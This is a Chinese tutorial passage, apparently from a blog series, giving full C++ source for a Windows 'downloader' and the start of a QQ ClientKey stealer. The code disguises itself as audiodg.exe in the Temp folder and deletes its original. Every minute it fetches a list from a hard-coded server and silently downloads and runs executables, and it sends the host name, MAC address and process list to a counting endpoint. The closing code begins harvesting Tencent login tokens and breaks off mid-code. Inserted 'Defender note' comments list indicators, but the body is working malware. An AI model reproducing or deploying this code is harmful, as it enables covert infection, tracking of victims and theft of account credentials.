接着上一篇文章 :
打造一款智能下载者 Downloader(基础篇)
本次我们主要继续完善下载者的功能,将添加劫持QQ Key(QQ Clientkey)模块。
鉴于之前已经开篇研究过截取QQ Key(QQ Clientkey)的流程,那么直接将代码复制粘贴即可。
原文:
最新利用腾讯快捷登录协议截取QQ ClientKey实战课程【详细教学-源码共享】
相关链接:
第三课:打造一款智能下载者 Downloader(统计系统安装篇)
Downloader v1.1 版 代码 —— 2023.09.23
// downloader.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "downloader.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )
// Function-pointer types for Win32 APIs that main() resolves at run time through
// LoadLibrary/GetProcAddress ("CopyFileA", "ShellExecuteA", "URLDownloadToFileA")
// instead of calling them directly.
// Defender note: the API names are still passed to GetProcAddress as plain strings,
// so they stay visible to string-based static analysis of the binary.
typedef BOOL(_stdcall *XXXCY)(LPCTSTR, LPCTSTR, BOOL);
typedef HINSTANCE(_stdcall *XXXCute)(HWND, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, int);
typedef HRESULT(_stdcall *XXXDL)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
// SendDataToCount/PostDataToCount declare local function pointers with these same
// names; the two typedefs themselves are not used as types in the code shown.
typedef HINTERNET(_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
typedef HINTERNET(_stdcall *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
// Forward declarations of the helpers defined after main().
BOOL DelSlef();
BOOL DelTempFiles();
BOOL GetProcessName(LPCTSTR szProcess);
CString GetAllProcessNames();
BOOL SendDataToCount();
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2, TCHAR *szState3);
void GetWinOS();
BOOL IsWow64OSEx();
CString GetMacAddress(void);
// Hard-coded configuration. Both URLs are network indicators for this sample.
TCHAR szLBFile[MAX_PATH] = "https://www.chwm.vip/load.swf"; // URL of the remote list file ("process|url" lines, parsed in main)
TCHAR szCountUrl[MAX_PATH] = "https://www.chwm.vip/Count.php"; // URL of the statistics (check-in) endpoint
TCHAR szVersion[MAX_PATH] = "1.1"; // program version, sent as "ver"
TCHAR szUserID[MAX_PATH] = "admin"; // customer id, sent as "ID"; also used as the mutex name in main
TCHAR szLBSaveFile[MAX_PATH] = { 0 }; // local path the list file is saved to
TCHAR szEXESaveFile[MAX_PATH] = { 0 }; // directory downloaded programs are saved in
TCHAR szSelfFilePath[MAX_PATH] = { 0 }; // full path of the running executable
TCHAR szSelfSaveFile[MAX_PATH] = { 0 }; // path the program copies itself to
TCHAR osx[MAX_PATH] = { 0 }; // OS version string filled in by GetWinOS
// URLs that were already downloaded and started. The original comment says "10M";
// the array is 10240 TCHARs (about 10 KB when TCHAR is char, which the strstr calls imply).
TCHAR CGLB[10240] = { 0 };
BOOL TJ = FALSE; // becomes TRUE once SendDataToCount() has succeeded
BOOL ReStart = FALSE; // becomes TRUE when a command-line argument contains "ReStart"
// The one and only application object
CWinApp theApp;
using namespace std;
// Entry point of the v1.1 sample. Flow, as written below:
//   1. Without a "ReStart" argument: copy the running executable into
//      %LOCALAPPDATA%\Temp (as audiodg.exe, or under a random 16-character name when
//      audiodg.exe already exists), start the copy with the argument " ReStart",
//      delete the original through DelSlef() and exit.
//   2. With "ReStart": take a named mutex, then loop forever: fetch the list at
//      szLBFile and, for every "process|url" line whose process is running and whose
//      URL is not yet in CGLB, download the URL to a randomly named .EXE and open it.
//   3. Report host details once through SendDataToCount(), sleep 60 s, repeat.
// Defender note: the observable behaviour is an executable under %LOCALAPPDATA%\Temp
// started with the argument "ReStart", a mutex named after szUserID, a request to
// szLBFile every minute, and child processes started from 16-character [0-9A-F]
// .EXE files in the same Temp directory.
int main(int argc, char *argv[])
{
// Not referenced again in this function; presumably a build marker — confirm.
CString Encryption_Point = "****** 2023.09.23 ******";
// Substring match over every argument, argv[0] included.
for (int i = 0; i < argc; i++)
{
if (strstr(argv[i], "ReStart"))
{
ReStart = TRUE;
}
}
// Full path of the running executable.
GetModuleFileName(NULL, szSelfFilePath, MAX_PATH);
// Resolve the per-user local application data directory (CSIDL_LOCAL_APPDATA /
// FOLDERID_LocalAppData, shell version 5.0: the file-system directory that serves as
// a data repository for local, non-roaming applications).
// Typical path: C:\Documents and Settings\username\Local Settings\Application Data
SHGetSpecialFolderPath(NULL, szLBSaveFile, CSIDL_LOCAL_APPDATA, TRUE);
SHGetSpecialFolderPath(NULL, szEXESaveFile, CSIDL_LOCAL_APPDATA, TRUE);
SHGetSpecialFolderPath(NULL, szSelfSaveFile, CSIDL_LOCAL_APPDATA, TRUE);
lstrcat(szLBSaveFile, "\\Temp\\Load.tmp");
lstrcat(szEXESaveFile, "\\Temp");
// Defender note: audiodg.exe is also the file name of a Windows system component
// that normally lives in System32; the same name under %LOCALAPPDATA%\Temp is a
// masquerading indicator.
lstrcat(szSelfSaveFile, "\\Temp\\audiodg.exe");
if ( !ReStart )
{
// Query the attributes of the target path to find out whether it already exists.
DWORD dwFileAttr = GetFileAttributes(szSelfSaveFile);
// INVALID_FILE_ATTRIBUTES: the audiodg.exe copy is not there yet.
if (dwFileAttr == INVALID_FILE_ATTRIBUTES)
{
// Copy self; CopyFileA is looked up by name at run time.
XXXCY cy;
HMODULE hkernel;
hkernel = LoadLibrary(_T("kernel32.dll"));
cy = (XXXCY)GetProcAddress(hkernel, "CopyFileA");
if (cy != NULL)
{
// Third argument FALSE = do not fail when the destination exists.
cy(szSelfFilePath, szSelfSaveFile, FALSE);
}
cy = NULL;
FreeLibrary(hkernel);
Sleep(500);
// Start the copy with the marker argument, remove the original, and exit.
lstrcat(szSelfSaveFile, " ReStart");
WinExec(szSelfSaveFile, SW_SHOW);
DelSlef();
exit(0);
}
else
{
CString szSelfRandomName = NULL;
CString szRand1 = NULL, szRand2 = NULL;
// Build a 16-character random name: each character is a digit '0'-'9'
// (rand() % 10 + 48) or a letter 'A'-'F' (rand() % 6 + 65). rand() is seeded from
// the clock, and the loop sleeps 100 ms per character.
time_t seed = time(NULL);
srand((unsigned)seed);
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 10 + 48);
break;
default:
szRand1.Format("%C", rand() % 6 + 65);
}
szRand2 += szRand1;
Sleep(100);
}
szSelfRandomName.Format(TEXT("\\%s.EXE"), szRand2);
TCHAR *szSelfRandomNames = szSelfRandomName.GetBuffer(szSelfRandomName.GetLength() + 1);
szSelfRandomName.ReleaseBuffer();
// Target becomes <LocalAppData>\Temp\<random>.EXE
lstrcpy(szSelfSaveFile, szEXESaveFile);
lstrcat(szSelfSaveFile, szSelfRandomNames);
// Copy self, same run-time lookup as in the branch above.
XXXCY cy;
HMODULE hkernel;
hkernel = LoadLibrary(_T("kernel32.dll"));
cy = (XXXCY)GetProcAddress(hkernel, "CopyFileA");
if (cy != NULL)
{
cy(szSelfFilePath, szSelfSaveFile, FALSE);
}
cy = NULL;
FreeLibrary(hkernel);
Sleep(500);
lstrcat(szSelfSaveFile, " ReStart");
WinExec(szSelfSaveFile, SW_SHOW);
DelSlef();
exit(0);
}
}
// Create a named mutex so that only one instance keeps running.
// The mutex name is szUserID, which makes it a host-based indicator.
SetLastError(0);
HANDLE g_hMutex = ::CreateMutex(NULL, FALSE, szUserID);
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
exit(0);
}
// Main work loop; one pass per minute (see the Sleep at the bottom).
do{
// Flush the DNS cache and delete WinINet cache entries (see DelTempFiles).
DelTempFiles();
// Fetch the remote list file; URLDownloadToFileA is looked up by name at run time.
XXXDL kkkkkkk;
HMODULE hurlmon;
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szLBFile, szLBSaveFile, 0, NULL);
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);
Sleep(500);
CString myText = NULL;
TCHAR Buffer[MAX_PATH] = { 0 };
// Read the saved list line by line.
FILE *TK = fopen(szLBSaveFile, "r+");
while (fgets(Buffer, sizeof(Buffer), TK) != NULL)
{
myText.Format("%s", Buffer);
//AfxMessageBox(myText);
CString szProcess = NULL, szURL = NULL;
// 0-based index of the first '|' in myText (the original comment said "comma");
// Find returns -1 when there is none.
int pos = myText.Find("|");
if (pos >= 0)
{
// Everything left of the '|' is the process name to look for.
szProcess.Format("%s", myText.Left(pos));
//AfxMessageBox(szProcess);
// Everything right of the '|' is the download URL.
szURL.Format("%s", myText.Mid(pos + 1));
//AfxMessageBox(szURL);
TCHAR *TargetURL = szURL.GetBuffer(szURL.GetLength() + 1);
szURL.ReleaseBuffer();
// Skip URLs that are already recorded in the success list.
if ( !strstr(CGLB, TargetURL) )
{
// Act only when a process with the listed name is running on this host.
if ( GetProcessName(szProcess) )
{
CString myEXESaveFile = NULL;
CString szRand1 = NULL, szRand2 = NULL;
// 16-character random file name from [0-9A-F], same scheme as above.
time_t seed = time(NULL);
srand((unsigned)seed);
for (int j = 0; j < 16; j++)
{
switch ((rand() % 2))
{
case 1:
szRand1.Format("%C", rand() % 10 + 48);
break;
default:
szRand1.Format("%C", rand() % 6 + 65);
}
szRand2 += szRand1;
Sleep(100);
}
myEXESaveFile.Format(TEXT("%s\\%s.EXE"), szEXESaveFile, szRand2);
//AfxMessageBox(myEXESaveFile);
hurlmon = LoadLibrary(_T("urlmon.dll"));
kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");
if (kkkkkkk != NULL)
{
HRESULT hRes = kkkkkkk(NULL, szURL, myEXESaveFile, 0, NULL);
if (hRes == S_OK)
{
// Open the downloaded file; ShellExecuteA is looked up by name at run time.
HMODULE hshell;
hshell = LoadLibrary(_T("shell32.dll"));
XXXCute cute;
cute = (XXXCute)GetProcAddress(hshell, "ShellExecuteA");
if (cute != NULL)
{
HINSTANCE hNewExe = cute(NULL, "open", myEXESaveFile, NULL, NULL, SW_SHOW);
// ShellExecute reports success with a value greater than 32.
if ((DWORD)hNewExe > 32)
{
// Downloaded and started: remember the URL in the success list
// so it is not downloaded again.
lstrcat(CGLB, TargetURL);
}
}
cute = NULL;
FreeLibrary(hshell);
}
}
kkkkkkk = NULL;
FreeLibrary(hurlmon);
}
}
}
}
fclose(TK);
// The saved list is removed after every pass.
DeleteFile(szLBSaveFile);
if ( !TJ )
{
// Send the host statistics; repeated on each pass until it succeeds once.
if ( SendDataToCount() )
{
TJ = TRUE;
}
// Ask the shell to refresh its caches.
SHChangeNotify(SHCNE_ASSOCCHANGED, SHCNF_FLUSHNOWAIT, NULL, NULL);
}
// Wait one minute before the next pass.
Sleep(60000);
} while (1);
return 0;
}
// Deletes the running executable from disk by handing the job to the command
// interpreter: it starts %COMSPEC% hidden with `/c del "<short path of self>" > nul`.
// Returns TRUE when the command interpreter was started, FALSE otherwise.
// Defender note: a hidden cmd.exe child whose command line is `/c del "<path>" > nul`
// and whose parent image is the file being deleted is the process-creation event
// to look for.
BOOL DelSlef()
{
SHELLEXECUTEINFO sei;
TCHAR szModule[MAX_PATH], szComspec[MAX_PATH], szParams[MAX_PATH];
// Get our own file name (converted to its short 8.3 form) and the full path of
// the command interpreter from the COMSPEC environment variable.
if ((GetModuleFileName(0, szModule, MAX_PATH) != 0) &&
(GetShortPathName(szModule, szModule, MAX_PATH) != 0) &&
(GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) != 0)) {
// Build the parameter string: /c del "<module>" > nul
lstrcpy(szParams, "/c del ");
lstrcat(szParams, "\"");
lstrcat(szParams, szModule);
lstrcat(szParams, "\"");
lstrcat(szParams, " > nul");
sei.cbSize = sizeof(sei);
sei.hwnd = 0;
sei.lpVerb = "Open";
sei.lpFile = szComspec;
sei.lpParameters = szParams;
sei.lpDirectory = 0; sei.nShow = SW_HIDE;
// Ask for the process handle so the priority calls below can use it.
sei.fMask = SEE_MASK_NOCLOSEPROCESS;
if (ShellExecuteEx(&sei)) {
// The command interpreter is set to NORMAL priority (the original comment
// said "idle", which does not match the constant used).
SetPriorityClass(sei.hProcess, NORMAL_PRIORITY_CLASS);
// Raise the priority of our own process and thread to the maximum.
SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
// Tell the shell that the file has been deleted.
SHChangeNotify(SHCNE_DELETE, SHCNF_PATH, szModule, 0);
return TRUE;
}
}
return FALSE;
}
// Flushes the DNS resolver cache and empties the WinINet URL cache.
// It first starts `ipconfig.exe /flushdns` hidden, then walks the cache with
// FindFirstUrlCacheEntry/FindNextUrlCacheEntry and deletes every entry that is not a
// cookie. The walk is a small state machine driven by the last error code.
// Always returns TRUE; bResult is set but never returned.
// Defender note: main() calls this once per loop pass, so a hidden
// `ipconfig.exe /flushdns` recurring about every minute from the same parent process
// is a usable behavioural signal.
BOOL DelTempFiles()
{
ShellExecute(NULL, "open", "ipconfig.exe", " /flushdns", NULL, SW_HIDE);
BOOL bResult = FALSE;
BOOL bDone = FALSE;
LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;
DWORD dwTrySize, dwEntrySize = 4096; // start buffer size
HANDLE hCacheDir = NULL;
// Starting in the "buffer too small" state forces the first allocation.
DWORD dwError = ERROR_INSUFFICIENT_BUFFER;
do
{
switch (dwError)
{
// need a bigger buffer: reallocate with the size the API asked for and retry
case ERROR_INSUFFICIENT_BUFFER:
delete[] lpCacheEntry;
lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];
lpCacheEntry->dwStructSize = dwEntrySize;
dwTrySize = dwEntrySize;
BOOL bSuccess;
// First call opens the enumeration; later calls continue it.
if (hCacheDir == NULL)
bSuccess = (hCacheDir
= FindFirstUrlCacheEntry(NULL, lpCacheEntry,
&dwTrySize)) != NULL;
else
bSuccess = FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize);
if (bSuccess)
dwError = ERROR_SUCCESS;
else
{
dwError = GetLastError();
dwEntrySize = dwTrySize; // use new size returned
}
break;
// we are done
case ERROR_NO_MORE_ITEMS:
bDone = TRUE;
bResult = TRUE;
break;
// we have got an entry
case ERROR_SUCCESS:
// don't delete cookie entry
if (!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))
DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
// get ready for next entry
dwTrySize = dwEntrySize;
if (FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize))
dwError = ERROR_SUCCESS;
else
{
dwError = GetLastError();
dwEntrySize = dwTrySize; // use new size returned
}
break;
// unknown error
default:
bDone = TRUE;
break;
}
// Release the entry buffer and the enumeration handle once the walk has ended.
if (bDone)
{
delete[]lpCacheEntry;
if (hCacheDir)
FindCloseUrlCache(hCacheDir);
}
} while (!bDone);
return TRUE;
}
// Reports whether a process with the given executable name is currently running.
// szProcess: executable name to look for; compared case-insensitively (both sides
//            are lower-cased) against PROCESSENTRY32::szExeFile.
// Returns TRUE on the first match, FALSE when no process in the snapshot matches.
BOOL GetProcessName(LPCTSTR szProcess)
{
// Snapshot of all processes in the system.
HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe32x = { sizeof(PROCESSENTRY32),0 };
if (Process32First(hShot, &pe32x))
{
CString TargetName = NULL;
TargetName.Format(TEXT("%s"), szProcess);
TargetName.MakeLower();
do {
CString ProcessName = NULL;
ProcessName.Format("%s", pe32x.szExeFile);
ProcessName.MakeLower();
if (ProcessName == TargetName)
{
// Close the snapshot before the early return.
CloseHandle(hShot);
return TRUE;
}
} while (Process32Next(hShot, &pe32x));
}
CloseHandle(hShot);
return FALSE;
}
// Returns the executable names of all running processes as one string, each name
// followed by '|'. Returns an empty string when the snapshot yields no entries.
// SendDataToCount() places this string in the "jc" field of the check-in URL.
CString GetAllProcessNames()
{
CString AllProcessNames = "";
HANDLE hShot2 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32),0 };
if (Process32First(hShot2, &pe32))
{
do {
// Local variable; it shares its name with the GetProcessName() function.
CString GetProcessName = "";
GetProcessName.Format(TEXT("%s"), pe32.szExeFile);
AllProcessNames += GetProcessName;
AllProcessNames += "|";
} while (Process32Next(hShot2, &pe32));
}
CloseHandle(hShot2);
return AllProcessNames;
}
// Sends a one-off host report to the statistics endpoint (szCountUrl).
// The report is a URL query string carrying: jc = '|'-separated list of running
// processes, ver = program version, ID = customer id, MN = host name, os = OS
// version, mac = adapter address. It is sent with InternetOpenUrlA.
// Returns TRUE when the response contains "Fail", "Success" or "Repeat"; otherwise
// the report is retried without the process list through PostDataToCount() and that
// result is returned. Returns FALSE when the URL cannot be opened or read.
// Defender note: the parameter names jc/ver/ID/MN/os/mac (CP instead of MN in the
// retry) on a request to szCountUrl are a network signature for this check-in, and
// the process list and MAC address leaving the host is the data exposure to assess.
BOOL SendDataToCount()
{
TCHAR dat[10240] = { 0 };
TCHAR jsj[MAX_PATH] = { 0 };
WSADATA _wsaData = { 0 };
ZeroMemory(dat, 10240 * sizeof(TCHAR));
ZeroMemory(jsj, MAX_PATH * sizeof(TCHAR));
int _Result = 0;
// Winsock is initialised only to call gethostname(); jsj receives the host name,
// or a placeholder string when a call reports SOCKET_ERROR.
_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw1");
}
_Result = gethostname(jsj, sizeof(jsj));
if (_Result == SOCKET_ERROR)
{
lstrcat(jsj, "unkonw2");
}
WSACleanup();
// Fills the global osx with the OS product name and bitness.
GetWinOS();
CString szMac = NULL;
szMac = GetMacAddress();
TCHAR *MAC = szMac.GetBuffer(szMac.GetLength() + 1);
szMac.ReleaseBuffer();
CString szProcess = NULL;
szProcess = GetAllProcessNames();
TCHAR *PROCESS = szProcess.GetBuffer(szProcess.GetLength() + 1);
szProcess.ReleaseBuffer();
// Build the report URL.
lstrcpy(dat, szCountUrl);
lstrcat(dat, "?jc=");
lstrcat(dat, PROCESS);
lstrcat(dat, "&ver=");
lstrcat(dat, szVersion);
lstrcat(dat, "&ID=");
lstrcat(dat, szUserID);
lstrcat(dat, "&MN=");
lstrcat(dat, jsj);
lstrcat(dat, "&os=");
lstrcat(dat, osx);
lstrcat(dat, "&mac=");
lstrcat(dat, MAC);
// The WinINet entry points are looked up by name at run time. These local
// function pointers are declared with an HINSTANCE return type.
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
// No user-agent string is supplied (first argument NULL); proxy settings are taken
// from the system configuration.
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, dat, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
// InternetReadFile is called directly here, unlike the three lookups above.
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
// Any of the three status words in the response counts as "report delivered".
char *myMSG1;
myMSG1 = strstr(buffer, "Fail");
char *myMSG2;
myMSG2 = strstr(buffer, "Success");
char *myMSG3;
myMSG3 = strstr(buffer, "Repeat");
if (myMSG1 || myMSG2 || myMSG3)
{
return TRUE;
}
else
{
// An over-long process list can make the report fail, so the report is
// sent again here without the process list (szProcess).
TCHAR postData[1024] = { 0 };
ZeroMemory(postData, 1024 * sizeof(TCHAR));
lstrcpy(postData, szCountUrl);
lstrcat(postData, "?ver=");
lstrcat(postData, szVersion);
lstrcat(postData, "&ID=");
lstrcat(postData, szUserID);
lstrcat(postData, "&CP=");
lstrcat(postData, jsj);
lstrcat(postData, "&os=");
lstrcat(postData, osx);
lstrcat(postData, "&mac=");
lstrcat(postData, MAC);
if ( PostDataToCount(postData, "Success", "Fail", "Repeat") )
{
return TRUE;
}
else
{
return FALSE;
}
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}
// Opens szPostURL with InternetOpenUrlA and checks the response for status words.
// Despite the name, no request body is built here: all data travels in the URL
// that the caller passes in.
// szPostURL: complete URL including the query string.
// szState1..szState3: substrings to look for in the first MAX_PATH bytes of the response.
// Returns TRUE when any of the three substrings is found, FALSE otherwise (including
// when the URL cannot be opened or read).
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2, TCHAR *szState3)
{
// The WinINet entry points are looked up by name at run time.
HMODULE hshell;
hshell = LoadLibrary(_T("wininet.dll"));
HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);
HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);
(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");
(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");
(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");
HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hropen != NULL)
{
HINTERNET hropenurl = XXXInternetOpenUrl(hropen, szPostURL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);
if (hropenurl != NULL)
{
TCHAR buffer[MAX_PATH] = { 0 };
ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));
DWORD dwBytesRead = 0;
BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);
if (ret)
{
// Look for each of the caller-supplied status words in the response.
TCHAR *myMSG1;
myMSG1 = strstr(buffer, szState1);
TCHAR *myMSG2;
myMSG2 = strstr(buffer, szState2);
TCHAR *myMSG3;
myMSG3 = strstr(buffer, szState3);
if (myMSG1 || myMSG2 || myMSG3)
{
XXXInternetCloseHandle(hropenurl);
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return TRUE;
}
}
}
XXXInternetCloseHandle(hropenurl);
}
XXXInternetCloseHandle(hropen);
FreeLibrary(hshell);
return FALSE;
}
// Fills the global osx with a description of the operating system: the registry
// value "ProductName" under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
// (read through the 64-bit registry view), or "Unknow System" when the value cannot
// be read, followed by " x64" or " x86" depending on IsWow64OSEx().
void GetWinOS()
{
HKEY hKEY;
LPCTSTR data_Set = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
long ret0 = (RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY));
if (ret0 == ERROR_SUCCESS)
{
// 80-byte buffer for the product name.
LPBYTE owner_Get1 = new BYTE[80];
DWORD type_1 = REG_SZ;
DWORD cbData_1 = 80;
ZeroMemory(osx, MAX_PATH * sizeof(TCHAR));
long ret1 = ::RegQueryValueEx(hKEY, "ProductName", NULL, &type_1, owner_Get1, &cbData_1);
if (ret1 == ERROR_SUCCESS)
{
char *OSVersion = (char *)owner_Get1;
lstrcpy(osx, OSVersion);
}
else
{
lstrcpy(osx, "Unknow System");
}
}
RegCloseKey(hKEY);
// Append the bitness: " x64" when this process runs under WOW64, " x86" otherwise.
if (IsWow64OSEx())
{
lstrcat(osx, " x64");
}
else
{
lstrcat(osx, " x86");
}
}
// Reports whether the current process runs under WOW64, i.e. is a 32-bit process on
// 64-bit Windows. IsWow64Process is looked up at run time; when kernel32 does not
// export it, or the call leaves the flag untouched, the function returns FALSE.
BOOL IsWow64OSEx()
{
typedef BOOL(WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
LPFN_ISWOW64PROCESS fnIsWow64Process;
BOOL bIsWow64 = FALSE;
fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandle("kernel32"), "IsWow64Process");
if (NULL != fnIsWow64Process)
{
// The return value of the call itself is not checked.
fnIsWow64Process(GetCurrentProcess(), &bIsWow64);
}
return bIsWow64;
}
// Result buffer for the NetBIOS adapter-status command (NCBASTAT): the adapter
// status block followed by room for up to 30 name entries.
typedef struct _ASTAT_
{
ADAPTER_STATUS adapt;
NAME_BUFFER NameBuff[30];
}ASTAT, *PASTAT;
// Queries the adapter status of one NetBIOS LAN adapter.
// lana_num: LANA number of the adapter to query.
// Adapter:  receives the status block, including the adapter address.
// Returns the NetBIOS return code of the status command (0 on success, as tested by
// the caller). The return code of the preceding reset command is overwritten.
UCHAR GetAddressByIndex(int lana_num, ASTAT & Adapter)
{
UCHAR uRetCode;
NCB ncb;
// Step 1: reset the adapter.
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBRESET;
ncb.ncb_lana_num = lana_num;
uRetCode = Netbios(&ncb);
// Step 2: request the adapter status into the caller's buffer.
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBASTAT;
ncb.ncb_lana_num = lana_num;
lstrcpy((char *)ncb.ncb_callname, "* ");
ncb.ncb_buffer = (unsigned char *)&Adapter;
ncb.ncb_length = sizeof(Adapter);
uRetCode = Netbios(&ncb);
return uRetCode;
}
// Returns an adapter (MAC) address as 12 upper-case hex digits without separators.
// The NetBIOS LAN adapters are enumerated with NCBENUM and each is queried through
// GetAddressByIndex(); every successful query overwrites the result, so the address
// of the last adapter that answered is returned. Returns an empty string when the
// enumeration fails or no adapter answers.
CString GetMacAddress(void)
{
CString strMacAddress;
NCB ncb;
UCHAR uRetCode;
int num = 0;
LANA_ENUM lana_enum;
// Enumerate the LANA numbers present on this host.
memset(&ncb, 0, sizeof(ncb));
ncb.ncb_command = NCBENUM;
ncb.ncb_buffer = (unsigned char *)&lana_enum;
ncb.ncb_length = sizeof(lana_enum);
uRetCode = Netbios(&ncb);
if (uRetCode == 0)
{
num = lana_enum.length;
for (int i = 0; i < num; i++)
{
ASTAT Adapter;
if (GetAddressByIndex(lana_enum.lana[i], Adapter) == 0)
{
// Six address bytes, two hex digits each.
strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"),
Adapter.adapt.adapter_address[0],
Adapter.adapt.adapter_address[1],
Adapter.adapt.adapter_address[2],
Adapter.adapt.adapter_address[3],
Adapter.adapt.adapter_address[4],
Adapter.adapt.adapter_address[5]);
}
}
}
return strMacAddress;
}
截取QQ Key(QQ Clientkey)代码
首次会话(查找 pt_local_token 的值):
// First session of the walkthrough: request the login page and read the
// pt_local_token value out of the raw response headers.
// Defender note: from the network this is an ordinary HTTPS GET; what stands out on
// the host is a process that is not a browser issuing it with the fixed agent string
// "Microsoft Internet Explorer".
// Split the URL into host name and path.
URL_COMPONENTSA crackedURL = { 0 };
char URL_STRING[] = "https://ssl.xui.ptlogin2.weiyun.com/cgi-bin/xlogin?appid=527020901&daid=372&low_login=0&qlogin_auto_login=1&s_url=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&style=20&hide_title=1&target=self&link_target=blank&hide_close_icon=1&pt_no_auth=1";
char szHostName[128] = { 0 };
char szUrlPath[256] = { 0 };
crackedURL.dwStructSize = sizeof(URL_COMPONENTSA);
crackedURL.lpszHostName = szHostName;
crackedURL.dwHostNameLength = ARRAYSIZE(szHostName);
crackedURL.lpszUrlPath = szUrlPath;
crackedURL.dwUrlPathLength = ARRAYSIZE(szUrlPath);
InternetCrackUrlA(URL_STRING, (DWORD)strlen(URL_STRING), 0, &crackedURL);
// Open the WinINet session (direct connection, no proxy).
HINTERNET hInternet = InternetOpenA("Microsoft Internet Explorer", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (hInternet != NULL){
HINTERNET hHttpSession = InternetConnectA(hInternet, crackedURL.lpszHostName, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (hHttpSession != NULL){
HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", crackedURL.lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);
if (hHttpRequest != NULL){
BOOL bRet = FALSE;
// Send the HTTP request.
bRet = HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);
if (bRet){
// Query the HTTP status code (read into dwRetCode; not evaluated afterwards).
DWORD dwRetCode = 0;
DWORD dwSizeOfRq = sizeof(DWORD);
